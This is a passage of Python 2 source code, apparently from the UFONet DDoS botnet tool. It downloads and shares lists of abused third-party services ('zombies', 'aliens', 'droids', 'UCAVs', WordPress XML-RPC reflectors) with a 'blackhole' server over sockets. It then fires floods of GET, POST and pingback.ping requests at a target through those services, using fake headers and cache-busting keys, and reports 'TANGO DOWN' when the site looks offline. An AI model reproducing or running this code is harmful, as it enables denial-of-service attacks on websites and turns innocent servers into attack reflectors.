"robots.txt.gz" drones = "drones.txt.gz" reflectors = "reflectors.txt.gz" try: print("Checking integrity of 'blackhole'...\n") urllib.urlretrieve('http://'+self.blackhole+'/ufonet/abductions.txt.gz', abductions) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/troops.txt.gz', troops) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/robots.txt.gz', robots) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/drones.txt.gz', drones) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', reflectors) print("Vortex: IS READY!") f_in_abductions = gzip.open(abductions, 'rb') f_out_abductions = open('abductions.txt', 'wb') f_out_abductions.write(f_in_abductions.read()) f_in_abductions.close() f_out_abductions.close() os.remove(abductions) # remove .gz file num_zombies = 0 with open('abductions.txt') as f: for _ in f: num_zombies = num_zombies + 1 print("\n[Info] - 'Zombies' on 'blackhole': "+ str(num_zombies)) f_in_robots = gzip.open(robots, 'rb') f_out_robots = open('robots.txt', 'wb') f_out_robots.write(f_in_robots.read()) f_in_robots.close() f_out_robots.close() os.remove(robots) # remove .gz file num_robots = 0 with open('robots.txt') as f: for _ in f: num_robots = num_robots + 1 print("[Info] - 'Droids' on 'blackhole' : "+ str(num_robots)) f_in_troops = gzip.open(troops, 'rb') f_out_troops = open('troops.txt', 'wb') f_out_troops.write(f_in_troops.read()) f_in_troops.close() f_out_troops.close() os.remove(troops) # remove .gz file num_aliens = 0 with open(self.aliens_file) as f: for _ in f: num_aliens = num_aliens + 1 print("[Info] - 'Aliens' on 'blackhole' : "+ str(num_aliens)) f_in_drones = gzip.open(drones, 'rb') f_out_drones = open('drones.txt', 'wb') f_out_drones.write(f_in_drones.read()) f_in_drones.close() f_out_drones.close() os.remove(drones) # remove .gz file num_drones = 0 with open('drones.txt') as f: for _ in f: num_drones = num_drones + 1 print("[Info] - 'Drones' on 'blackhole' : "+ str(num_drones)) f_in_reflectors = gzip.open(reflectors, 'rb') f_out_reflectors = open('reflectors.txt', 'wb') f_out_reflectors.write(f_in_reflectors.read()) f_in_reflectors.close() f_out_reflectors.close() os.remove(reflectors) # remove .gz file num_reflectors = 0 with open('reflectors.txt') as f: for _ in f: num_reflectors = num_reflectors + 1 print("[Info] - 'X-RPCs' on 'blackhole' : "+ str(num_reflectors)) print '-'*12 + '\n' if not self.options.forceyes: update_reply = raw_input("Want to merge ONLY new 'zombies' into the server? (Y/n)") print '-'*25 else: update_reply = "Y" if update_reply == "n" or update_reply == "N": os.remove('abductions.txt') # remove abductions file os.remove('troops.txt') # remove troops file os.remove('robots.txt') # remove robots file os.remove('drones.txt') # remove drones file os.remove('reflectors.txt') # remove reflectors file print "\n[Info] - Aborting upload process and cleaning temporal files. Bye!\n" return else: print "\n[Info] - Checking integrity of your list of 'zombies'. Starting test!\n" # only upload valid zombies print '='*35 zombies = self.extract_zombies() if not zombies: return test = self.testing(zombies) zombies_community = [] zombies_added = 0 f = open('abductions.txt') abductions = f.readlines() abductions = [abduction.strip() for abduction in abductions] f.close() fz = open(self.zombies_file) zombies = fz.readlines() zombies = [zombie.strip() for zombie in zombies] fz.close() for zombie in zombies: if zombie not in abductions: zombies_community.append(zombie) zombies_added = zombies_added + 1 else: pass print("[Info] - New 'zombies' found: " + str(zombies_added)) aliens = self.extract_aliens() if not aliens: return aliens_community = [] aliens_added = 0 f = open('troops.txt') troops = f.readlines() troops = [troop.strip() for troop in troops] f.close() fz = open(self.aliens_file) aliens = fz.readlines() aliens = [alien.strip() for alien in aliens] fz.close() for alien in aliens: if alien not in troops: aliens_community.append(alien) aliens_added = aliens_added + 1 else: pass print("[Info] - New 'aliens' found : " + str(aliens_added)) droids = self.extract_droids() if not droids: return droids_community = [] droids_added = 0 f = open('robots.txt') robots = f.readlines() robots = [robot.strip() for robot in robots] f.close() fz = open(self.droids_file) droids = fz.readlines() droids = [droid.strip() for droid in droids] fz.close() for droid in droids: if droid not in robots: droids_community.append(droid) droids_added = droids_added + 1 else: pass print("[Info] - New 'droids' found : " + str(droids_added)) ucavs = self.extract_ucavs() if not ucavs: return ucavs_community = [] ucavs_added = 0 f = open('drones.txt') drones = f.readlines() drones = [drone.strip() for drone in drones] f.close() fz = open(self.ucavs_file) ucavs = fz.readlines() ucavs = [ucav.strip() for ucav in ucavs] fz.close() for ucav in ucavs: if ucav not in drones: ucavs_community.append(ucav) ucavs_added = ucavs_added + 1 else: pass print("[Info] - New 'drones' found : " + str(ucavs_added)) rpcs = self.extract_rpcs() if not ucavs: return rpcs_community = [] rpcs_added = 0 f = open('reflectors.txt') reflectors = f.readlines() reflectors = [reflector.strip() for reflector in reflectors] f.close() fz = open(self.rpcs_file) rpcs = fz.readlines() rpcs = [rpc.strip() for rpc in rpcs] fz.close() for rpc in rpcs: if rpc not in reflectors: rpcs_community.append(rpc) rpcs_added = rpcs_added + 1 else: pass print("[Info] - New 'X-RPCs' found : " + str(rpcs_added)) print '-'*12 + '\n' if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0: # not zombies of any type os.remove('abductions.txt') # remove abductions file os.remove('troops.txt') # remove troops file os.remove('robots.txt') # remove robots file os.remove('drones.txt') # remove ucavs file os.remove('rpcs.txt') # remove rpcs file print("[Info] - Hehehe.. You should try to search for new 'zombies'. These are already in this 'blackhole'. ;-)\n") return else: fc = gzip.open('community_zombies.txt.gz', 'wb') for zombie in zombies_community: fc.write(zombie.strip()+"\n") fc.close() os.remove('abductions.txt') # remove abductions file fc = gzip.open('community_aliens.txt.gz', 'wb') for alien in aliens_community: fc.write(alien.strip()+"\n") fc.close() os.remove('troops.txt') # remove troops file fc = gzip.open('community_droids.txt.gz', 'wb') for droid in droids_community: fc.write(droid.strip()+"\n") fc.close() os.remove('robots.txt') # remove robots file fc = gzip.open('community_ucavs.txt.gz', 'wb') for ucav in ucavs_community: fc.write(ucav.strip()+"\n") fc.close() os.remove('drones.txt') # remove drones file fc = gzip.open('community_rpcs.txt.gz', 'wb') for rpc in rpcs_community: fc.write(rpc.strip()+"\n") fc.close() os.remove('reflectors.txt') # remove reflectors file print("[Info] - Starting to upload new 'zombies'...\n") try: # open a socket and send data to ufonet_community reciever host = self.blackhole cport = 9991 mport = 9990 try: cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading cs.connect((host, cport)) cs.send("SEND " + 'community_zombies.txt.gz') cs.close() f = open('community_zombies.txt.gz', "rb") data = f.read() f.close() ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ms.connect((host, mport)) ms.send(data) ms.close() os.remove('community_zombies.txt.gz') # remove local zombies .gz file after transfer time.sleep(1) cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) cs.connect((host, cport)) cs.send("SEND " + 'community_aliens.txt.gz') cs.close() f = open('community_aliens.txt.gz', "rb") data = f.read() f.close() ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ms.connect((host, mport)) ms.send(data) ms.close() os.remove('community_aliens.txt.gz') # remove local aliens .gz file after transfer time.sleep(1) cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) cs.connect((host, cport)) cs.send("SEND " + 'community_robots.txt.gz') cs.close() f = open('community_droids.txt.gz', "rb") data = f.read() f.close() ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ms.connect((host, mport)) ms.send(data) ms.close() os.remove('community_droids.txt.gz') # remove local droids .gz file after transfer time.sleep(1) cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) cs.connect((host, cport)) cs.send("SEND " + 'community_ucavs.txt.gz') cs.close() f = open('community_ucavs.txt.gz', "rb") data = f.read() f.close() ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ms.connect((host, mport)) ms.send(data) ms.close() os.remove('community_ucavs.txt.gz') # remove local ucavs .gz file after transfer time.sleep(1) cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading cs.connect((host, cport)) cs.send("SEND " + 'community_rpcs.txt.gz') cs.close() f = open('community_rpcs.txt.gz', "rb") data = f.read() f.close() ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ms.connect((host, mport)) ms.send(data) ms.close() os.remove('community_rpcs.txt.gz') # remove local rpcs .gz file after transfer time.sleep(2) # sleep a bit more print '-'*12 + '\n' print("[Info] - Transfer: DONE!. Thanks for your contribution ;-)\n") except Exception, e: print str(e) + "\n" except: print '-'*12 + '\n' print("[Error] - Connecting sockets to 'blackhole'. Aborting!\n") return except: print '-'*12 + '\n' print("[Error] - Unable to upload list of 'zombies' to this 'blackhole'. ;(\n") return #sys.exit(2) def downloading_list(self): # add your mirror to protect/share/distribute zombies import urllib, gzip abductions = "abductions.txt.gz" troops = "troops.txt.gz" robots = "robots.txt.gz" drones = "drones.txt.gz" reflectors = "reflectors.txt.gz" try: print("Trying 'blackhole': "+self.blackhole+"\n") urllib.urlretrieve('http://'+self.blackhole+'/ufonet/abductions.txt.gz', abductions) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/troops.txt.gz', troops) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/robots.txt.gz', robots) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/drones.txt.gz', drones) urllib.urlretrieve('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', reflectors) print("Vortex: IS READY!") except: print("Vortex: FAILED!") print '-'*12 + '\n' print("[Error] - Unable to download list of 'zombies' from this 'blackhole'. ;(\n") return #sys.exit(2) print '-'*12 + '\n' f_in_abductions = gzip.open(abductions, 'rb') f_out_abductions = open('abductions.txt', 'wb') f_out_abductions.write(f_in_abductions.read()) f_in_abductions.close() f_out_abductions.close() os.remove(abductions) # remove abductions .gz file f_in_troops = gzip.open(troops, 'rb') f_out_troops = open('troops.txt', 'wb') f_out_troops.write(f_in_troops.read()) f_in_troops.close() f_out_troops.close() os.remove(troops) # remove troops .gz file f_in_robots = gzip.open(robots, 'rb') f_out_robots = open('robots.txt', 'wb') f_out_robots.write(f_in_robots.read()) f_in_robots.close() f_out_robots.close() os.remove(robots) # remove abductions .gz file f_in_drones = gzip.open(drones, 'rb') f_out_drones = open('drones.txt', 'wb') f_out_drones.write(f_in_drones.read()) f_in_drones.close() f_out_drones.close() os.remove(drones) # remove reflectors .gz file f_in_reflectors = gzip.open(reflectors, 'rb') f_out_reflectors = open('reflectors.txt', 'wb') f_out_reflectors.write(f_in_reflectors.read()) f_in_reflectors.close() f_out_reflectors.close() os.remove(reflectors) # remove reflectors .gz file num_abductions = 0 with open('abductions.txt') as f: for _ in f: num_abductions = num_abductions + 1 print("[Info] - Zombies: " + str(num_abductions)) num_robots = 0 with open('robots.txt') as f: for _ in f: num_robots = num_robots + 1 print("[Info] - Droids : " + str(num_robots)) num_troops = 0 with open('troops.txt') as f: for _ in f: num_troops = num_troops + 1 print("[Info] - Aliens : " + str(num_troops)) num_drones = 0 with open('drones.txt') as f: for _ in f: num_drones = num_drones + 1 print("[Info] - UCAVs : " + str(num_drones)) num_reflectors = 0 with open('reflectors.txt') as f: for _ in f: num_reflectors = num_reflectors + 1 print("[Info] - X-RPCs : " + str(num_reflectors)) total_zombies = num_abductions + num_troops + num_robots + num_drones + num_reflectors print("\n[Info] - Congratulations!. Total downloaded: " + str(total_zombies)) print '-'*12 if not self.options.forceyes: update_reply = raw_input("\nWant to merge ONLY new 'troops' in your army? (Y/n)") print '-'*25 else: update_reply = "Y" if update_reply == "n" or update_reply == "N": os.remove('abductions.txt') # remove abductions file os.remove('troops.txt') # remove troops file os.remove('robots.txt') # remove robots file os.remove('drones.txt') # remove drones file os.remove('reflectors.txt') # remove reflectors file print "\n[Info] - List downloaded has been removed. Bye!\n" else: zombies_ready = [] f = open('abductions.txt') abductions = f.readlines() f.close() fz = open(self.zombies_file) zombies = fz.readlines() fz.close() for abduction in abductions: abduction = abduction.replace('\n','') if abduction not in zombies: zombies_ready.append(abduction) else: pass self.update_zombies(zombies_ready) os.remove('abductions.txt') # remove abductions .txt file aliens_ready = [] f = open('troops.txt') troops = f.readlines() f.close() fz = open(self.aliens_file) aliens = fz.readlines() fz.close() for alien in troops: alien = alien.replace('\n','') if alien not in aliens: aliens_ready.append(alien) else: pass self.update_aliens(aliens_ready) os.remove('troops.txt') # remove troops .txt file droids_ready = [] f = open('robots.txt') robots = f.readlines() f.close() fz = open(self.droids_file) droids = fz.readlines() fz.close() for droid in robots: droid = droid.replace('\n','') if droid not in droids: droids_ready.append(droid) else: pass self.update_droids(droids_ready) os.remove('robots.txt') # remove robots .txt file ucavs_ready = [] f = open('drones.txt') drones = f.readlines() f.close() fz = open(self.ucavs_file) ucavs = fz.readlines() fz.close() for drone in drones: drone = drone.replace('\n','') if drone not in ucavs: ucavs_ready.append(drone) else: pass self.update_ucavs(ucavs_ready) os.remove('drones.txt') # remove drones .txt file rpcs_ready = [] f = open('reflectors.txt') reflectors = f.readlines() f.close() fz = open(self.rpcs_file) rpcs = fz.readlines() fz.close() for reflector in reflectors: reflector = reflector.replace('\n','') if reflector not in rpcs: rpcs_ready.append(reflector) else: pass self.update_rpcs(rpcs_ready) os.remove('reflectors.txt') # remove reflectors .txt file print "\n[Info] - Botnet updated! ;-)\n" self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole) def create_web_interface(self): # launch webserver+gui from webgui import ClientThread import webbrowser host = '' port = 9999 try: webbrowser.open('', new=1) tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) tcpsock.bind((host,port)) while True: tcpsock.listen(4) #print "Listening for incoming connections on http://%s:%d" % (host,port) (clientsock, (ip, port)) = tcpsock.accept() newthread = ClientThread(ip, port, clientsock) newthread.start() except (KeyboardInterrupt, SystemExit): sys.exit() # def crawlering(self): # # crawl target's links to discover web structure # options = self.options # myurl = options.crawl # for i in re.findall('''href=["'](.[^"']+)["']''', urllib.urlopen(myurl).read(), re.I): # print i def extract_dorks(self): # extract dorks from file (ex: 'dorks.txt') try: f = open(self.dorks_file) dorks = f.readlines() dorks = [ dork.replace('\n','') for dork in dorks ] f.close() if not dorks: if not options.autosearch: print "\n[Error] - Imposible to retrieve 'dorks' from file.\n" return else: return dorks except: if not options.autosearch: if os.path.exists(self.dorks_file) == True: print '[Error] - Cannot open:', 'dorks.txt', "\n" return #sys.exit(2) else: print '[Error] - Cannot found:', 'dorks.txt', "\n" return #sys.exit(2) else: return def search_zombies(self, dork, zombies_found): # crawlering on search engine results to extract zombies options = self.options zombies = [] if not options.engine: # default search engine options.engine = 'yahoo' #if options.engine == 'duck': # using duck [09/08/2016: deprecated! -> duck has removed 'inurl' operator] # url = 'https://duckduckgo.com/html/' # ex: POST -> path # if options.search: # search from query # q = 'inurl:"' + str(options.search) + '"' # set query to search literally on results [ deprecated ] # if options.dorks: # search from a dork # q = 'inurl:"' + str(dork) + '"' # set query from a dork to search literally on results [ deprecated ] # data = 'q=' + q + '&b=&kl=us-en&kp=-1' # evade safe search # self.user_agent = random.choice(self.agents).strip() # suffle user-agent # headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer # if options.verbose: # print("[Info] Query used: " + url + " [POST -> " + data + "]\n") # try: # req = urllib2.Request(url, data, headers) # rsp = urllib2.urlopen(req) # content = rsp.read() # except: # print('[Error] - Unable to connect to duck\n') # if options.allengines: # return # if not options.dorks: # if not self.options.forceyes: # update_reply = raw_input("Want to try a different search engine? (Y/n)") # else: # update_reply = "Y" # if update_reply == "n" or update_reply == "N": # return #sys.exit(2) # print "\nSearch engines available:" # print '-'*25 # for e in self.search_engines: # print "+ "+e # print '-'*25 # print "\nEx: ufonet -s 'proxy.php?url=' --se 'duck'" # return #sys.exit(2) # else: # req_reply = '' # regex = '')[1].split('')[0].strip() if not tor_reply or 'Congratulations' not in tor_reply: print("[Info] It seems that you are not using TOR to recieve data. Good!\n") else: print("[Error] You are using TOR as public IP... It's not possible to NAT!\n") self.nat_error_flag = "ON" return #sys.exit(2) try: data = str(urlopen('http://checkip.dyndns.com/').read()) # check for public ip self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1) except: try: # another check for public ip data = str(urlopen('http://whatismyip.org/').read()) self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)').search(data).group(1) except: print("[Error] Something wrong checking your public IP using an external service. Try it again!\n") self.nat_error_flag = "ON" return #sys.exit(2) print " + Public: " + self.pub_ip + "\n" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(('', 0)) # connecting to a UDP address doesn't send packets (black magic) self.local_ip = s.getsockname()[0] print " + Local: " + self.local_ip + "\n" print '='*22 + '\n' def extract_ucavs(self): # extract ucavs from file options = self.options try: f = open(self.ucavs_file) ucavs = f.readlines() ucavs = [ ucav.replace('\n','') for ucav in ucavs ] f.close() if not ucavs: print "\n[Error] - Imposible to retrieve 'ucavs' from file.\n" return else: return ucavs except: if os.path.exists(self.ucavs_file) == True: print '\n[Error] - Cannot open:', 'ucavs.txt', "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', 'ucavs.txt', "\n" return #sys.exit(2) def check_is_up(self, target): # extract external status checkers, perform a request and check results options = self.options num_is_up = 0 # counter for 'up' reports num_is_down = 0 # counter for 'down' reports print "\n[Info] Flying some UCAV with 'heat-beam' weapons...\n" ucavs = self.extract_ucavs() # extract ucavs from file self.total_ucavs = len(ucavs) # add total of ucavs to stats shuffle(ucavs) # suffle ucavs for ucav in ucavs: self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer if target.startswith("http://"): # parse target for some checkers target = target.replace('http://','') elif target.startswith("https://"): target = target.replace('https://','') url = ucav + target if options.verbose: print("[Info] Sniping: " + url) try: if options.proxy: # set proxy self.proxy_transport(options.proxy) req = urllib2.Request(url, None, headers) target_reply = urllib2.urlopen(req).read() else: req = urllib2.Request(url, None, headers) target_reply = urllib2.urlopen(req, context=self.ctx).read() self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats except: print "[Error] UCAV: " + ucav + " -> FAILED (cannot connect!)" self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats if not "is down" or not "looks down" in target_reply: # parse external service for reply print "[Info] UCAV: " + ucav + " -> HIT! || Report: ONLINE! [Keep shooting!]" num_is_up = num_is_up + 1 else: print "[Info] UCAV: " + ucav + " -> FAILED? || Report: Target looks OFFLINE from here!!! ;-)" num_is_down = num_is_down + 1 if num_is_down > 0 and num_is_up == 0: # check for: 1 or more down, 0 up print "\n[Info] Congratulations!. Your target looks OFFLINE from external sources...\n" if not self.options.forceyes: update_reply = raw_input("Want to send a [HEAD] check request from your proxy? (y/N)") print '-'*25 else: update_reply = "N" if update_reply == "y" or update_reply == "Y": try: # send HEAD connection self.head = True reply = self.connect_zombie(target) self.head = False if reply: print "\n[Info] Wow! Target is replying you... Keep shooting!\n" else: print "\n[Info] #UFONet TANGO DOWN!!! -> " +target + "\n" self.update_targets_crashed() # update targets crashed stats self.update_mothership_stats() # update mothership completed attack stats if self.options.web: return else: sys.exit(2) # Debug traceback (without crash) to celebrate it! ;-) except Exception: print "[Error] Something wrong with your connection!" if self.options.verbose: traceback.print_exc() return #sys.exit(2) else: print "[Info] #UFONet TANGO DOWN!!! -> " +target + "\n" self.update_targets_crashed() # update targets crashed stats self.update_mothership_stats() # update mothership completed attack stats if self.options.web: return else: sys.exit(2) # Debug traceback (without crash) for celebrate it! ;-) def send_aliens(self, target): # extract external web abuse services urls (POST) and perform requests against target options = self.options print "\n[Info] Deploying heavy alien troops with 'laser-cannon' weapons...\n" aliens = self.extract_aliens() # extract aliens from file self.total_aliens = len(aliens) # add total of aliens to stats shuffle(aliens) # suffle aliens for alien in aliens: if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics pattern_alien = re.compile(regex_alien) alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics pattern_param = re.compile(regex_param) param = re.findall(pattern_param, alien) # HTTP POST params to submit for u in alien_url: url = u # ex: POST -> path/submit.php print "[Info] Firing from: " + url for p in param: param_target = {p : target} # ex POST -> url=target param_target = urllib.urlencode(param_target) try: if options.verbose: print "[Info] Sniping: " + url + " - POST:", param_target req = urllib2.Request(url, param_target) rsp = urllib2.urlopen(req) #content = rsp.read() self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats except Exception: print "[Error] Alien: " + alien + " -> FAILED (cannot connect!)" self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats def extract_aliens(self): # extract aliens from file options = self.options try: f = open(self.aliens_file) aliens = f.readlines() aliens = [ alien.replace('\n','') for alien in aliens ] f.close() if not aliens: print "\n[Error] - Imposible to retrieve 'aliens' from file.\n" return else: return aliens except: if os.path.exists(self.aliens_file) == True: print '\n[Error] - Cannot open:', 'aliens.txt', "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', 'aliens.txt', "\n" return #sys.exit(2) def send_droids(self, target): # extract external web abuse services urls (GET) and perform requests against target options = self.options print "\n[Info] Deploying droids with 'light-laser' weapons...\n" droids = self.extract_droids() # extract droids from file self.total_droids = len(droids) # add total of droids to stats shuffle(droids) # suffle droids target = urllib.unquote(target).decode('utf8') # parte urlencoding if target.startswith('http://'): # remove http target = target.replace('http://', '') if target.startswith('https://'): target = target.replace('https://', '') # remove https for droid in droids: if "$TARGET" in droid: # replace droid/parameter for target url = droid.replace("$TARGET", target) print "[Info] Firing from: " + url self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers try: req = urllib2.Request(url, None, headers) rsp = urllib2.urlopen(req) self.droids_hit = self.droids_hit + 1 # add hit to droids stats except Exception: print "[Error] Droid: " + url + " -> FAILED (cannot connect!)" self.droids_fail = self.droids_fail + 1 # add fail to droids stats def extract_droids(self): # extract droids from file options = self.options try: f = open(self.droids_file) droids = f.readlines() droids = [ droid.replace('\n','') for droid in droids ] f.close() if not droids: print "\n[Error] - Imposible to retrieve 'droids' from file.\n" return else: return droids except: if os.path.exists(self.droids_file) == True: print '\n[Error] - Cannot open:', 'droids.txt', "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', 'droids.txt', "\n" return #sys.exit(2) def send_rpcs(self, target): # extract vulnerable XML-RPC pingback services and perform requests against target print "\n[Info] Aiming 'plasma' cannon reflector turrets...\n" rpcs = self.extract_rpcs() # extract rpcs from file self.total_rpcs = len(rpcs) # add total of rpcs to stats shuffle(rpcs) # suffle rpcs def random_key(length): key = '' for i in range(length): key += random.choice(string.lowercase + string.uppercase + string.digits) return key for rpc in rpcs: print "[Info] Firing from: " + rpc self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer key = random_key(8) # generate random value page to bypass cache rpc_page = "?" + str(key) key = random_key(6) # re-generate random value id to bypass cache rpc_id = "=" + str(key) target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj) if "/xmlrpc.php" in rpc: rpc_place = rpc.replace("xmlrpc.php", "") rpc_exploit = "pingback.ping"+target_place+""+rpc_place+"" try: req = urllib2.Request(rpc, rpc_exploit, headers) target_reply = urllib2.urlopen(req, context=self.ctx).read() self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats if self.options.verbose: print "Reply:", target_reply except: print "[Error] X-RPC: " + rpc + " -> FAILED (cannot connect!)" self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats def extract_rpcs(self): # extract rpcs from file options = self.options try: f = open(self.rpcs_file) rpcs = f.readlines() rpcs = [ rpc.replace('\r','') for rpc in rpcs ] rpcs = [ rpc.replace('\n','') for rpc in rpcs ] f.close() if not rpcs: print "\n[Error] - Imposible to retrieve 'rpcs' from file.\n" return else: return rpcs except: if os.path.exists(self.rpcs_file) == True: print '\n[Error] - Cannot open:', 'rpcs.txt', "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', 'rpcs.txt', "\n" return #sys.exit(2) def extract_zombies(self): # extract targets from file options = self.options if self.options.test: try: f = open(options.test) zombies = f.readlines() zombies = [ zombie.replace('\n','') for zombie in zombies ] f.close() if not zombies: print "\n[Error] - Imposible to extract 'zombies' from file "+options.test+".\n" return else: return zombies except: if os.path.exists(options.test) == True: print '\n[Error] - Cannot open:', options.test, "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', options.test, "\n" return #sys.exit(2) else: try: f = open(self.zombies_file) zombies = f.readlines() zombies = [ zombie.replace('\n','') for zombie in zombies ] f.close() if not zombies: print "\n[Error] - Imposible to retrieve 'zombies' from file.\n" return else: return zombies except: if os.path.exists(self.zombies_file) == True: print '\n[Error] - Cannot open:', 'zombies.txt', "\n" return #sys.exit(2) else: print '\n[Error] - Cannot found:', 'zombies.txt', "\n" return #sys.exit(2) def update_zombies(self, zombies_ready): # update zombies on file options = self.options if options.attackme: f = open(self.zombies_file, "w") # re-write list for zombie in self.doll.real_zombies: # add only alien verified zombies for x in zombie: f.write(str(x) + os.linesep) f.close() if options.test or options.testall: if not options.test: options.test = self.zombies_file f = open(options.test, "w") # re-write list only with zombies ready for zombie in zombies_ready: f.write(zombie + os.linesep) f.close() if options.search or options.dorks or options.autosearch or options.download: # append only new zombies to list (dorking supported) f = open(self.zombies_file) zombies_on_file = f.read().splitlines() with open(self.zombies_file, "a") as zombie_list: for zombie in zombies_ready: if zombie not in zombies_on_file: # parse possible repetitions zombie_list.write(zombie + os.linesep) if options.download: self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole) else: self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking) f.close() def update_aliens(self, aliens_ready): # update aliens on file options = self.options if options.download: # append only new aliens to list f = open(self.aliens_file) aliens_on_file = f.read().splitlines() with open(self.aliens_file, "a") as alien_list: for alien in aliens_ready: if alien not in aliens_on_file: # parse possible repetitions alien_list.write(alien + os.linesep) self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole) f.close() def update_droids(self, droids_ready): # update droids on file options = self.options if options.download: # append only new droids to list f = open(self.droids_file) droids_on_file = f.read().splitlines() with open(self.droids_file, "a") as droid_list: for droid in droids_ready: if droid not in droids_on_file: # parse possible repetitions droid_list.write(droid + os.linesep) self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole) f.close() def update_ucavs(self, ucavs_ready): # update ucavs on file options = self.options if options.download: # append only new ucavs to list f = open(self.ucavs_file) ucavs_on_file = f.read().splitlines() with open(self.ucavs_file, "a") as ucav_list: for ucav in ucavs_ready: if ucav not in ucavs_on_file: # parse possible repetitions ucav_list.write(ucav + os.linesep) self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole) f.close() def update_rpcs(self, rpcs_ready): # update rpcs on file options = self.options if options.testrpc or options.testall: f = open(self.rpcs_file, "w") # re-write list for rpc in rpcs_ready: # add only rpc verified zombies f.write(rpc + os.linesep) f.close() if options.download: # append only new rpcs to list f = open(self.rpcs_file) rpcs_on_file = f.read().splitlines() with open(self.rpcs_file, "a") as rpc_list: for rpc in rpcs_ready: if rpc not in rpcs_on_file: # parse possible repetitions rpc_list.write(rpc + os.linesep) self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole) f.close() def search_rpc(self, rpc_host): rpc_vulnerable = False self.user_agent = random.choice(self.agents).strip() # suffle user-agent headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer try: if self.options.testall: # testing_all req = urllib2.Request(rpc_host, None, headers) rpc_code = urllib2.urlopen(req).read() rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code) for link in rpc_links: if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url) rpc_pingback_url = link[0] rpc_vulnerable = True break # found it! else: # not any XML-RPC discovering methods are working rpc_pingback_url = rpc_host + "/xmlrpc.php" rpc_vulnerable = False else: if rpc_host.startswith("http://"): rpc_host = rpc_host.replace("http://", "") if rpc_host.startswith("https://"): rpc_host = rpc_host.replace("https://", "") rpc_host = urlparse(rpc_host) rpc_path = rpc_host.path.replace("\r", "") self.head = True # send HTTP HEAD request searching for: X-Pingback reply = self.connect_zombie(rpc_path) self.head = False if "X-Pingback" in reply: # discovering pingback-enabled resources m = re.search('X-Pingback: (.+?)\n', reply) # regex magics rpc_pingback_url = m.group(1) # extract rpc server url rpc_vulnerable = True else: # not X-Pingback on HTTP Headers (search for 0: if not self.options.forceyes: test_reply = raw_input("Want to update your army? (Y/n)\n") print '-'*25 + "\n" else: test_reply = "Y" if test_reply == "n" or test_reply == "N": print "Bye!\n" return else: disc_zombies = self.discard_zombies(discarded) # discard zombies from botnet (remove from files) print '='*52 print "\n - DISCARDED:", disc_zombies new_botnet = int(len(botnet) - disc_zombies) print "\n+ New Total Botnet:", str(new_botnet), "\n" print '='*52 + '\n' else: print "[Info] ALL checked 'zombies' are ONLINE... Exiting!\n" def discard_zombies(self, discarded): disc_zombies = 0 zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file] for l in zombies_list: f = open(l, "r+") d = f.readlines() f.close() f = open(l, "w") disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies) f.close() return disc_zombies def 